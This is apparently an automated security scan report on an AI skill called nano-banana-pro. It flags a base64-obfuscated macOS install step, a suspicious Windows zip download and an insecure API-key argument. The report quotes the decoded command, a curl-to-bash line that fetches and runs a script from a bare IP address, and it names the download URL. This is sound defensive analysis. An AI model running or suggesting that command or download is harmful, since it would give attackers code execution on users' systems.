Trust Assessment
nano-banana-pro received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Remote Code Execution via Obfuscated Command", and "API Key Exposure via Command-Line Argument".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Details | Layer | Location |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell | Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-e3c48l/SKILL.md:10 |
| CRITICAL | Remote Code Execution via Obfuscated Command | The macOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an untrusted IP address (`91.92.242.30`) directly into a shell. This allows for immediate remote code execution on the user's system, posing an extreme security risk. This also constitutes a hidden instruction and a severe supply chain risk. Remove the obfuscated command. Provide a clear, auditable, and secure installation method, preferably using a package manager or a script from a trusted, version-controlled source. The IP address should be replaced with a trusted domain, and direct execution of downloaded scripts should be avoided. | LLM | SKILL.md:15 |
| HIGH | API Key Exposure via Command-Line Argument | The skill allows users to pass their `GEMINI_API_KEY` directly as a command-line argument (`--api-key KEY`). This practice is insecure as API keys passed this way can be exposed in shell history, process lists, or system logs, making them vulnerable to unauthorized access. While environment variables are also supported, the `--api-key` option creates an unnecessary risk vector for credential harvesting. Remove the `--api-key` command-line argument option. Enforce the use of environment variables (e.g., `GEMINI_API_KEY`) or a secure configuration file for handling API keys. If an argument is absolutely necessary, ensure it's handled securely (e.g., prompting for input, using a secure credential store). | LLM | SKILL.md:30 |
| MEDIUM | Untrusted Binary Download for Windows | The Windows installation guide directs users to download a `.zip` file containing an executable from a specific GitHub release URL (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`). While GitHub is a common platform, direct downloads of executables from individual user repositories without further integrity checks (like cryptographic signatures or checksums) introduce a supply chain risk. A compromise of the `syazema` account or repository could lead to the distribution of malicious software. The hardcoded zip password `openclaw` is also noted. Provide a more secure distribution method, such as a signed installer, a package manager, or at least cryptographic checksums (SHA256) for the downloaded file, along with instructions on how to verify them. Consider hosting binaries on a more controlled and audited distribution channel. | LLM | SKILL.md:9 |